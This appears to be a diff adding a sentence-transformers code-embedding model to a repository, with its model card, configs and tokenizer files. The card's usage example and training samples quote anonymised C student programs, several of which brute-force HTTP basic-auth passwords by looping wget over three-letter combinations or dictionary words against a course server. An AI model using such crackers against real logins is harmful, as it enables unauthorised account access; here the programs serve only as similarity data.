+ '\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n#define MAX_SIZE 255\n\n\nint (int argc, char *argv[])\n {\n FILE *fp;\n \n while(1)\n { \n system("wget -p http://www.cs.rmit.edu./students");\n\n\n\n system("mkdir data"); \n if((fp=fopen("./data/index.html","r"))==NULL)\n { \n system("cp www.cs.rmit.edu./students/index.html ./data");\n\t \n }\n else\n { \n \n\t \n\t system("diff ./data/index.html www.cs.rmit.edu./students/index.html | mail @cs.rmit.edu.");\n\t system("cp www.cs.rmit.edu./students/index.html ./data");\n } \n\n\n\n system("mkdir images"); \n if((fp=fopen("./images/file.txt","r"))==NULL)\n { \n system("md5sum www.cs.rmit.edu./images/*.* > ./images/file.txt");\n\t\t \n }\n \n else\n { \n system("md5sum www.cs.rmit.edu./images/*.* > www.cs.rmit.edu./file.txt");\n\t \n\t \n\t \n\t system("diff ./images/file.txt www.cs.rmit.edu./file.txt | mail @cs.rmit.edu.");\n\t system("cp www.cs.rmit.edu./file.txt ./images");\n }\n sleep(86400); \n }\t\n return (EXIT_SUCCESS);\n }\n \n\t \n\t \t\n',
572
+ '\n\n#include <stdio.h>\n#include <string.h>\n#include <sys/time.h>\n\n#define OneBillion 1e9\n#define false 0\n#define true 1\nint execPassword(char *, char *b) {\n\n\n char [100]={\'\\0\'};\n strcpy(,b);\n \n strcat(,);\n printf ("Sending command %s\\n",);\n if ( system()== 0) {\n printf ("\\n password is : %s",);\n return 1;\n }\n return 0;\n}\n \n\nint bruteForce(char [],char comb[],char *url) {\n\n\nint i,j,k;\n\n for(i=0;i<52 ;i++) {\n comb[0]= [i];\n if (execPassword(comb,url)== 1) return 1; \n for(j=0;j<52;j++) {\n comb[1] = [j];\n if(execPassword(comb,url)==1) return 1;\n for(k=0;k<52;k++) {\n comb[2] = [k];\n if(execPassword(comb,url)==1) return 1;\n }\n comb[1] = \'\\0\';\n }\n }\n return 0;\n\n} \n\nint (char *argc, char *argv[]) {\n\n int i,j,k;\n char strin[80] = {\'\\0\'};\n char *passwd;\n char a[] = {\'a\',\'b\',\'c\',\'d\',\'e\',\'f\',\'g\',\'h\',\'i\',\'j\',\'k\',\'l\',\'m\',\'n\',\'o\',\'p\',\'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\',\'z\',\'A\',\'B\',\'C\',\'D\',\'E\',\'F\',\'G\',\'H\',\'K\',\'L\',\'M\',\'N\',\'O\',\'P\',\'Q\',\'R\',\'S\',\'T\',\'U\',\'V\',\'W\',\'X\',\'Y\',\'Z\'};\n char v[4]={\'\\0\'};\n int startTime, stopTime, final;\n int flag=false; \n strcpy(strin,"wget http://sec-crack.cs.rmit.edu./SEC/2/ --http-user= --http-passwd=");\n\n startTime = time();\n if (bruteForce(a,v,strin)==1) {\n stopTime = time();\n final = stopTime-startTime;\n }\n\n printf ("\\n The password is : %s",v);\n printf("%lld nanoseconds (%lf) seconds \\n", final, (double)final/OneBillion );\n\n}\n',
573
+ ]
574
+ embeddings = model.encode(sentences)
575
+ print(embeddings.shape)
576
+ # [3, 768]
577
+
578
+ # Get the similarity scores for the embeddings
579
+ similarities = model.similarity(embeddings, embeddings)
580
+ print(similarities)
581
+ # tensor([[1.0000, 0.9892, 0.9953],
582
+ # [0.9892, 1.0000, 0.9908],
583
+ # [0.9953, 0.9908, 1.0000]])
584
+ ```
585
+
586
+ <!--
587
+ ### Direct Usage (Transformers)
588
+
589
+ <details><summary>Click to see the direct usage in Transformers</summary>
590
+
591
+ </details>
592
+ -->
593
+
594
+ <!--
595
+ ### Downstream Usage (Sentence Transformers)
596
+
597
+ You can finetune this model on your own dataset.
598
+
599
+ <details><summary>Click to expand</summary>
600
+
601
+ </details>
602
+ -->
603
+
604
+ <!--
605
+ ### Out-of-Scope Use
606
+
607
+ *List how the model may foreseeably be misused and address what users ought not to do with the model.*
608
+ -->
609
+
610
+ <!--
611
+ ## Bias, Risks and Limitations
612
+
613
+ *What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
614
+ -->
615
+
616
+ <!--
617
+ ### Recommendations
618
+
619
+ *What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
620
+ -->
621
+
622
+ ## Training Details
623
+
624
+ ### Training Dataset
625
+
626
+ #### Unnamed Dataset
627
+
628
+ * Size: 3,081 training samples
629
+ * Columns: <code>sentence_0</code>, <code>sentence_1</code>, and <code>label</code>
630
+ * Approximate statistics based on the first 1000 samples:
631
+ | | sentence_0 | sentence_1 | label |
632
+ |:--------|:--------------------------------------------------------------------------------------|:--------------------------------------------------------------------------------------|:-----------------------------------------------|
633
+ | type | string | string | int |
634
+ | details | <ul><li>min: 194 tokens</li><li>mean: 471.57 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 194 tokens</li><li>mean: 458.65 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>0: ~99.20%</li><li>1: ~0.80%</li></ul> |
635
+ * Samples:
636
+ | sentence_0 | sentence_1 | label |
637
+ |:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------||:---------------|
638
+ | <code>#include <strings.h><br>#include <string.h><br>#include <ctype.h><br>#include<sys/time.h><br>#include <stdio.h><br>#include <stdlib.h><br>#include <sys/times.h><br><br><br><br>int ()<br>{<br> int i,j,k,syst;<br> char password[4],first[100],last[100];<br> int count =0; <br> char arr[52] ={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',<br> 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};<br> strcpy(first, "wget --http-user= --http-passwd=");<br> strcpy(last, " http://sec-crack.cs.rmit.edu./SEC/2/");<br> int Start_time,End_time,Total_time,average; <br> Start_time = time();<br>printf(" Time =%11dms\n", Start_time);<br> for (i=0;i<=52;i++)<br> {<br> for (j=0;j<=52;j++)<br> {<br> for(k=0;k<=52;k++)<br> {<br> password[0] = arr[i];<br> password[1] = arr[j];<br> password[2] = arr[k];<br> password[3] = '\0';<br> printf(" The Combination of the password tried %s \n" ,password);<br> printf("*...</code> | <code>#include <stdio.h><br>#include <stdlib.h><br>#include <sys/times.h><br>#include <strings.h><br>#include <string.h><br>#include <ctype.h><br><br><br><br>int ()<br>{<br> int i,j,k,sysoutput;<br> char pass[4],b[50], a[50],c[51] ,[2],string1[100],string2[100],temp1[3];<br> char arr[52] ={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',<br> 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};<br> strcpy(string1, "wget --http-user= --http-passwd=");<br> strcpy(string2, " http://sec-crack.cs.rmit.edu./SEC/2/");<br> <br> for (i=0;i<=52;i++)<br> { <br> [0] = arr[i];<br> [1] ='\0'; <br> strcpy(a,);<br> <br> printf("The first value is %s \n", a); <br><br> for (j=0;j<=52;j++)<br> { [0] = arr[j];<br> [1] = '\0'; <br> strcpy(temp1,a);<br> strcat(a,);<br> strcpy(b,a);<br> strcpy(a,temp1);<br> printf("The second value is %s \n", b); <br> for(k=0;k<=52;k++)<br> { <br> [0] =arr[k];<br> [1] = '\0...</code> | <code>1</code> |
639
+ | <code>#include<stdio.h><br>#include<string.h><br>#include<strings.h><br>#include<stdlib.h><br>#include<sys/time.h><br><br>()<br>{<br> int i,m,k,count=0;<br> FILE* diction;<br> FILE* log;<br> char s[30];<br> char pic[30];<br> char add[1000];<br> char end[100];<br> time_t ,finish;<br> double ttime;<br> <br> strcpy(add,"wget --http-user= --http-passwd=");<br> strcpy( end,"-nv -o logd http://sec-crack.cs.rmit.edu./SEC/2/");<br> diction=fopen("/usr/share/lib/dict/words","r");<br> =time(NULL);<br> while(fgets(s,100,diction)!=NULL) <br> { <br> printf("%s\n",s);<br> for(m=40,k=0;k<(strlen(s)-1);k++,m++)<br> {<br> add[m]=s[k];<br> }<br> add[m++]=' ';<br> for(i=0;i<50;i++,m++)<br> {<br> add[m]=end[i];<br> }<br> add[m]='\0';<br> <br> system(add);<br> count++;<br> log=fopen("logd","r");<br> fgets(pic,100,log);<br> printf("%s",pic);<br> if(strcmp(pic,"Authorization failed.\n")!=0) <br> {<br> finish=time(NULL);<br> ttime=difftime(,finish);<br> printf( "\n The time_var take:%f/n The of passwords tried is %d\n",ttime,count);<br> break;<br> }<br> fclose(log);<br> }<br><br>}<br></code> | <code><br><br><br><br>#include <stdio.h><br>#include <stdlib.h><br>#include <time.h><br><br>int () <br>{<br> int i,j,k,cntr=0;<br> char pass[3];<br> char password[3];<br> char get[96];<br> char username[]="";<br> int R_VALUE;<br> double time_used;<br> <br> clock_t ,end; <br> <br> =clock(); <br> <br> <br> <br> for (i = 65; i <= 122; i++)<br> {<br> if(i==91) {i=97;}<br> <br> for (j = 65; j <= 122; j++)<br> {<br> if(j==91) {j=97;}<br> <br> for (k = 65; k <= 122; k++)<br> {<br> if(k==91) {k=97;} <br> <br> pass[0] = i;<br> pass[1] = j;<br> pass[2] = k;<br> sprintf(password,"%c%c%c",pass[0],pass[1],pass[2]); <br> cntr++;<br> <br> printf("%d )%s\n\n", cntr, password);<br> sprintf(get,"wget --non-verbose --http-user=%s --http-passwd=%s http://sec-crack.cs.rmit.edu./SEC/2/",username,password);<br> <br><br> R_VALUE=system(get);<br> <br> if(R_VALUE==0) <br> {<br> printf("The Password has been cracked and it is : %s" , password);<br> ...</code> | <code>0</code> |
640
+ | <code><br><br> <br> <br><br><br>#include<stdio.h><br>#include<stdlib.h><br>#include<string.h><br><br> <br> int ()<br> {<br> char url[30];<br> int exitValue=-1;<br> FILE *fr;<br><br> char s[300]; <br> system("rm index.html*");<br> system("wget http://www.cs.rmit.edu./students/ "); <br> system("mv index.html one.html");<br> <br> printf("System completed Writing\n"); <br> system("sleep 3600");<br> <br> <br> system("wget http://www.cs.rmit.edu./students/ "); <br> <br> <br> <br> exitValue=system("diff one.html index.html > .out" );<br> <br> fr=fopen(".out","r");<br> <br> strcpy(s,"mailx -s \"Testing Again\"");<br> <br> strcat(s," < .out");<br> if(fgets(url,30,fr))<br> {<br> system(s);<br> <br> system("rm one.html"); <br> <br> printf("\nCheck your mail") ; <br> fclose(fr); <br> }<br> else<br> {<br> printf(" changes detected"); <br> <br> system("rm one.html"); <br> fc...</code> | <code>#include<stdio.h><br>#include<stdlib.h><br>#include<string.h><br>#include<ctype.h><br>#include<time.h><br><br>int ()<br>{<br><br> int m,n,o,i;<br> time_t u1,u2;<br> char v[3];<br> char temp1[100];<br> char temp2[100];<br> char temp3[250];<br> FILE *fin1;<br> <br> char point[25];<br> fin1=fopen("./words.txt","r");<br> <br> if(fin1==NULL)<br> {<br> printf(" open the file ");<br> exit(0);<br> } <br> <br><br> strcpy(temp2," --http-user= --http-passwd=");<br> strcpy(temp1,"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php");<br> <br> strcpy(temp3,"");<br> <br> (void) time(&u1); <br> <br> while(!feof(fin1)) <br> {<br> <br> fgets(point,25,fin1);<br> if(strlen(point)<=4)<br> {<br> <br> <br> strcpy(temp3,temp1);<br> strcat(temp3,temp2);<br> strcat(temp3,point);<br> printf("\nSending the %s\n",temp3);<br> i=system(temp3); <br> <br> if(i==0)<br> {<br> (void) time(&u2); <br> printf("\n The password is %s\n",point);<br> printf("\n\nThe time_var taken crack the passwork is %d second\n\n",(int)(u2-u1));<br> exit(0);<br> } <br> else<br> {<br> strcpy(temp3,"");<br> }<br> <br> <br> }<br> }<br> <br> <br>} ...</code> | <code>0</code> |
641
+ * Loss: [<code>BatchAllTripletLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#batchalltripletloss)
642
+
643
+ ### Training Hyperparameters
644
+ #### Non-Default Hyperparameters
645
+
646
+ - `per_device_train_batch_size`: 16
647
+ - `per_device_eval_batch_size`: 16
648
+ - `num_train_epochs`: 1
649
+ - `fp16`: True
650
+ - `multi_dataset_batch_sampler`: round_robin
651
+
652
+ #### All Hyperparameters
653
+ <details><summary>Click to expand</summary>
654
+
655
+ - `overwrite_output_dir`: False
656
+ - `do_predict`: False
657
+ - `eval_strategy`: no
658
+ - `prediction_loss_only`: True
659
+ - `per_device_train_batch_size`: 16
660
+ - `per_device_eval_batch_size`: 16
661
+ - `per_gpu_train_batch_size`: None
662
+ - `per_gpu_eval_batch_size`: None
663
+ - `gradient_accumulation_steps`: 1
664
+ - `eval_accumulation_steps`: None
665
+ - `torch_empty_cache_steps`: None
666
+ - `learning_rate`: 5e-05
667
+ - `weight_decay`: 0.0
668
+ - `adam_beta1`: 0.9
669
+ - `adam_beta2`: 0.999
670
+ - `adam_epsilon`: 1e-08
671
+ - `max_grad_norm`: 1
672
+ - `num_train_epochs`: 1
673
+ - `max_steps`: -1
674
+ - `lr_scheduler_type`: linear
675
+ - `lr_scheduler_kwargs`: {}
676
+ - `warmup_ratio`: 0.0
677
+ - `warmup_steps`: 0
678
+ - `log_level`: passive
679
+ - `log_level_replica`: warning
680
+ - `log_on_each_node`: True
681
+ - `logging_nan_inf_filter`: True
682
+ - `save_safetensors`: True
683
+ - `save_on_each_node`: False
684
+ - `save_only_model`: False
685
+ - `restore_callback_states_from_checkpoint`: False
686
+ - `no_cuda`: False
687
+ - `use_cpu`: False
688
+ - `use_mps_device`: False
689
+ - `seed`: 42
690
+ - `data_seed`: None
691
+ - `jit_mode_eval`: False
692
+ - `use_ipex`: False
693
+ - `bf16`: False
694
+ - `fp16`: True
695
+ - `fp16_opt_level`: O1
696
+ - `half_precision_backend`: auto
697
+ - `bf16_full_eval`: False
698
+ - `fp16_full_eval`: False
699
+ - `tf32`: None
700
+ - `local_rank`: 0
701
+ - `ddp_backend`: None
702
+ - `tpu_num_cores`: None
703
+ - `tpu_metrics_debug`: False
704
+ - `debug`: []
705
+ - `dataloader_drop_last`: False
706
+ - `dataloader_num_workers`: 0
707
+ - `dataloader_prefetch_factor`: None
708
+ - `past_index`: -1
709
+ - `disable_tqdm`: False
710
+ - `remove_unused_columns`: True
711
+ - `label_names`: None
712
+ - `load_best_model_at_end`: False
713
+ - `ignore_data_skip`: False
714
+ - `fsdp`: []
715
+ - `fsdp_min_num_params`: 0
716
+ - `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
717
+ - `fsdp_transformer_layer_cls_to_wrap`: None
718
+ - `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
719
+ - `deepspeed`: None
720
+ - `label_smoothing_factor`: 0.0
721
+ - `optim`: adamw_torch
722
+ - `optim_args`: None
723
+ - `adafactor`: False
724
+ - `group_by_length`: False
725
+ - `length_column_name`: length
726
+ - `ddp_find_unused_parameters`: None
727
+ - `ddp_bucket_cap_mb`: None
728
+ - `ddp_broadcast_buffers`: False
729
+ - `dataloader_pin_memory`: True
730
+ - `dataloader_persistent_workers`: False
731
+ - `skip_memory_metrics`: True
732
+ - `use_legacy_prediction_loop`: False
733
+ - `push_to_hub`: False
734
+ - `resume_from_checkpoint`: None
735
+ - `hub_model_id`: None
736
+ - `hub_strategy`: every_save
737
+ - `hub_private_repo`: None
738
+ - `hub_always_push`: False
739
+ - `gradient_checkpointing`: False
740
+ - `gradient_checkpointing_kwargs`: None
741
+ - `include_inputs_for_metrics`: False
742
+ - `include_for_metrics`: []
743
+ - `eval_do_concat_batches`: True
744
+ - `fp16_backend`: auto
745
+ - `push_to_hub_model_id`: None
746
+ - `push_to_hub_organization`: None
747
+ - `mp_parameters`:
748
+ - `auto_find_batch_size`: False
749
+ - `full_determinism`: False
750
+ - `torchdynamo`: None
751
+ - `ray_scope`: last
752
+ - `ddp_timeout`: 1800
753
+ - `torch_compile`: False
754
+ - `torch_compile_backend`: None
755
+ - `torch_compile_mode`: None
756
+ - `include_tokens_per_second`: False
757
+ - `include_num_input_tokens_seen`: False
758
+ - `neftune_noise_alpha`: None
759
+ - `optim_target_modules`: None
760
+ - `batch_eval_metrics`: False
761
+ - `eval_on_start`: False
762
+ - `use_liger_kernel`: False
763
+ - `eval_use_gather_object`: False
764
+ - `average_tokens_across_devices`: False
765
+ - `prompts`: None
766
+ - `batch_sampler`: batch_sampler
767
+ - `multi_dataset_batch_sampler`: round_robin
768
+ - `router_mapping`: {}
769
+ - `learning_rate_mapping`: {}
770
+
771
+ </details>
772
+
773
+ ### Framework Versions
774
+ - Python: 3.11.13
775
+ - Sentence Transformers: 5.0.0
776
+ - Transformers: 4.52.4
777
+ - PyTorch: 2.6.0+cu124
778
+ - Accelerate: 1.8.1
779
+ - Datasets: 3.6.0
780
+ - Tokenizers: 0.21.2
781
+
782
+ ## Citation
783
+
784
+ ### BibTeX
785
+
786
+ #### Sentence Transformers
787
+ ```bibtex
788
+ @inproceedings{reimers-2019-sentence-bert,
789
+ title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
790
+ author = "Reimers, Nils and Gurevych, Iryna",
791
+ booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
792
+ month = "11",
793
+ year = "2019",
794
+ publisher = "Association for Computational Linguistics",
795
+ url = "https://arxiv.org/abs/1908.10084",
796
+ }
797
+ ```
798
+
799
+ #### BatchAllTripletLoss
800
+ ```bibtex
801
+ @misc{hermans2017defense,
802
+ title={In Defense of the Triplet Loss for Person Re-Identification},
803
+ author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
804
+ year={2017},
805
+ eprint={1703.07737},
806
+ archivePrefix={arXiv},
807
+ primaryClass={cs.CV}
808
+ }
809
+ ```
810
+
811
+ <!--
812
+ ## Glossary
813
+
814
+ *Clearly define terms in order to be accessible across audiences.*
815
+ -->
816
+
817
+ <!--
818
+ ## Model Card Authors
819
+
820
+ *Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
821
+ -->
822
+
823
+ <!--
824
+ ## Model Card Contact
825
+
826
+ *Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
827
+ -->
config.json ADDED
@@ -0,0 +1,27 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "architectures": [
3
+ "RobertaModel"
4
+ ],
5
+ "attention_probs_dropout_prob": 0.1,
6
+ "bos_token_id": 0,
7
+ "classifier_dropout": null,
8
+ "eos_token_id": 2,
9
+ "hidden_act": "gelu",
10
+ "hidden_dropout_prob": 0.1,
11
+ "hidden_size": 768,
12
+ "initializer_range": 0.02,
13
+ "intermediate_size": 3072,
14
+ "layer_norm_eps": 1e-05,
15
+ "max_position_embeddings": 514,
16
+ "model_type": "roberta",
17
+ "num_attention_heads": 12,
18
+ "num_hidden_layers": 12,
19
+ "output_past": true,
20
+ "pad_token_id": 1,
21
+ "position_embedding_type": "absolute",
22
+ "torch_dtype": "float32",
23
+ "transformers_version": "4.52.4",
24
+ "type_vocab_size": 1,
25
+ "use_cache": true,
26
+ "vocab_size": 50265
27
+ }
config_sentence_transformers.json ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "model_type": "SentenceTransformer",
3
+ "__version__": {
4
+ "sentence_transformers": "5.0.0",
5
+ "transformers": "4.52.4",
6
+ "pytorch": "2.6.0+cu124"
7
+ },
8
+ "prompts": {
9
+ "query": "",
10
+ "document": ""
11
+ },
12
+ "default_prompt_name": null,
13
+ "similarity_fn_name": "cosine"
14
+ }
merges.txt ADDED
The diff for this file is too large to render. See raw diff
 
model.safetensors ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:25916e4dd9e51f4101337629a68e231c207326859f0dcdaa5c2ac7ba18841969
3
+ size 498604904
modules.json ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ [
2
+ {
3
+ "idx": 0,
4
+ "name": "0",
5
+ "path": "",
6
+ "type": "sentence_transformers.models.Transformer"
7
+ },
8
+ {
9
+ "idx": 1,
10
+ "name": "1",
11
+ "path": "1_Pooling",
12
+ "type": "sentence_transformers.models.Pooling"
13
+ }
14
+ ]
sentence_bert_config.json ADDED
@@ -0,0 +1,4 @@
 
 
 
 
 
1
+ {
2
+ "max_seq_length": 512,
3
+ "do_lower_case": false
4
+ }
special_tokens_map.json ADDED
@@ -0,0 +1,51 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "bos_token": {
3
+ "content": "<s>",
4
+ "lstrip": false,
5
+ "normalized": true,
6
+ "rstrip": false,
7
+ "single_word": false
8
+ },
9
+ "cls_token": {
10
+ "content": "<s>",
11
+ "lstrip": false,
12
+ "normalized": true,
13
+ "rstrip": false,
14
+ "single_word": false
15
+ },
16
+ "eos_token": {
17
+ "content": "</s>",
18
+ "lstrip": false,
19
+ "normalized": true,
20
+ "rstrip": false,
21
+ "single_word": false
22
+ },
23
+ "mask_token": {
24
+ "content": "<mask>",
25
+ "lstrip": true,
26
+ "normalized": false,
27
+ "rstrip": false,
28
+ "single_word": false
29
+ },
30
+ "pad_token": {
31
+ "content": "<pad>",
32
+ "lstrip": false,
33
+ "normalized": true,
34
+ "rstrip": false,
35
+ "single_word": false
36
+ },
37
+ "sep_token": {
38
+ "content": "</s>",
39
+ "lstrip": false,
40
+ "normalized": true,
41
+ "rstrip": false,
42
+ "single_word": false
43
+ },
44
+ "unk_token": {
45
+ "content": "<unk>",
46
+ "lstrip": false,
47
+ "normalized": true,
48
+ "rstrip": false,
49
+ "single_word": false
50
+ }
51
+ }
tokenizer.json ADDED
The diff for this file is too large to render. See raw diff
 
tokenizer_config.json ADDED
@@ -0,0 +1,58 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "add_prefix_space": false,
3
+ "added_tokens_decoder": {
4
+ "0": {
5
+ "content": "<s>",
6
+ "lstrip": false,
7
+ "normalized": true,
8
+ "rstrip": false,
9
+ "single_word": false,
10
+ "special": true
11
+ },
12
+ "1": {
13
+ "content": "<pad>",
14
+ "lstrip": false,
15
+ "normalized": true,
16
+ "rstrip": false,
17
+ "single_word": false,
18
+ "special": true
19
+ },
20
+ "2": {
21
+ "content": "</s>",
22
+ "lstrip": false,
23
+ "normalized": true,
24
+ "rstrip": false,
25
+ "single_word": false,
26
+ "special": true
27
+ },
28
+ "3": {
29
+ "content": "<unk>",
30
+ "lstrip": false,
31
+ "normalized": true,
32
+ "rstrip": false,
33
+ "single_word": false,
34
+ "special": true
35
+ },
36
+ "50264": {
37
+ "content": "<mask>",
38
+ "lstrip": true,
39
+ "normalized": false,
40
+ "rstrip": false,
41
+ "single_word": false,
42
+ "special": true
43
+ }
44
+ },
45
+ "bos_token": "<s>",
46
+ "clean_up_tokenization_spaces": false,
47
+ "cls_token": "<s>",
48
+ "eos_token": "</s>",
49
+ "errors": "replace",
50
+ "extra_special_tokens": {},
51
+ "mask_token": "<mask>",
52
+ "model_max_length": 512,
53
+ "pad_token": "<pad>",
54
+ "sep_token": "</s>",
55
+ "tokenizer_class": "RobertaTokenizer",
56
+ "trim_offsets": true,
57
+ "unk_token": "<unk>"
58
+ }
vocab.json ADDED
The diff for this file is too large to render. See raw diff